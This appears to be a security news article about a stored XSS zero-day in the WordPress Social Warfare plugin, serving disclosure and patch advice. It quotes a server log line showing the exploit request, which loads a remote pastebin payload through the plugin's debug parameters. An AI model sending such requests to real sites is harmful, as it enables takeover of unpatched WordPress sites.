Friday, February 7, 2025
HomeExploitZero-day Stored XSS Vulnerability in Wordpress Social Share Plug-in let Hackers to...

Zero-day Stored XSS Vulnerability in WordPress Social Share Plug-in let Hackers to Compromise 70,000 Websites

Published on

SIEM as a Service

Follow Us on Google News

Researchers discovered a critical Stored XSS Zero-day flaw in widely used social sharing plug-in called “Social Warfare” let attackers inject the malicious script and take over the vulnerable WordPress websites.

Social Warfare, a social sharing plugin for WordPress powered by Warfare Plugins that help to get more social shares for WordPress based website developers which can lead to more website traffic.

The plug-in contains a vulnerable code within some of the plugins debugging features that allows the payload gets stored in the site’s database and retrieved with every page request.

According to Sucuri research, “These features aren’t directly used anywhere and rely on various $_GET parameters to be executed, which makes it easy to see if your site was attacked using this vulnerability. “

This serious zero-day vulnerability allows attackers to completely take over the vulnerable website in the browser environment.

Attackers Already made an Exploits

Cyber Criminals already started abusing this vulnerability and a lot of exploits were distributed around the world.

There are very frequent attempts are ongoing from more than a hundred different IPs as you can see below,

202.254.236.49 - - [21/Mar/2019:16:52:14 -0400] "GET /wp-admin/admin-post.php?swp_debug=load_options&swp_url=https://pastebin.com/raw/0yJzqbYf HTTP/1.1" 403 2669 "-" "Mozilla/5.0 (Windows NT 6.1; Win64; x64; rv:64.0) Gecko/20100101 Firefox/64.0"

In this case attackers are injecting rogue javascript scripts by loading the following url , which contains this malicious payload.

If left unpatched, Attackers takes more advantage to mount successful, widespread attacks against vulnerable websites. 

There are 70, 000 websites are actively installed this plugin and the patch has been released and users are advised to update to version 3.5.3 as soon as possible.

Also, you can take this complete online Course Bundle if you want to learn Mastery Web Hacking & Bug Bounty

You can follow us on LinkedinTwitterFacebook for daily Cybersecurity updates.

Balaji
Balaji
BALAJI is an Ex-Security Researcher (Threat Research Labs) at Comodo Cybersecurity. Editor-in-Chief & Co-Founder - Cyber Security News & GBHackers On Security.

Latest articles

Dell Update Manager Plugin Flaw Exposes Sensitive Data

Dell Technologies has issued a security advisory (DSA-2025-047) to address a vulnerability in the Dell Update...

DeepSeek iOS App Leaks Data to ByteDance Servers Without Encryption

DeepSeek iOS app—a highly popular AI assistant recently crowned as the top iOS app...

Critical Flaws in HPE Aruba ClearPass Expose Systems to Arbitrary Code Execution

Hewlett Packard Enterprise (HPE) has issued a high-priority security bulletin addressing multiple vulnerabilities in...

Splunk Introduces “DECEIVE” an AI-Powered Honeypot to Track Cyber Threats

Splunk has unveiled DECEIVE (DECeption with Evaluative Integrated Validation Engine), an innovative, AI-augmented honeypot that mimics...

Supply Chain Attack Prevention

Free Webinar - Supply Chain Attack Prevention

Recent attacks like Polyfill[.]io show how compromised third-party components become backdoors for hackers. PCI DSS 4.0’s Requirement 6.4.3 mandates stricter browser script controls, while Requirement 12.8 focuses on securing third-party providers.

Join Vivekanand Gopalan (VP of Products – Indusface) and Phani Deepak Akella (VP of Marketing – Indusface) as they break down these compliance requirements and share strategies to protect your applications from supply chain attacks.

Discussion points

Meeting PCI DSS 4.0 mandates.
Blocking malicious components and unauthorized JavaScript execution.
PIdentifying attack surfaces from third-party dependencies.
Preventing man-in-the-browser attacks with proactive monitoring.

More like this

XE Hacker Group Exploiting Veracode 0-Day’s to Deploy Malware & Steal Credit Card Details

The XE Group, a sophisticated Vietnamese-origin cybercrime organization active since 2013, has escalated its...

MobSF Framework Zero-Day Vulnerability Allows Attackers to Trigger DoS in Scan Results

A recently discovered zero-day vulnerability in the Mobile Security Framework (MobSF) has raised alarms...

Zero-Day Vulnerabilities in Microsoft Sysinternals Tools Enable DLL Injection Attacks on Windows

A significant zero-day vulnerability has been uncovered in Microsoft Sysinternals tools, posing a severe...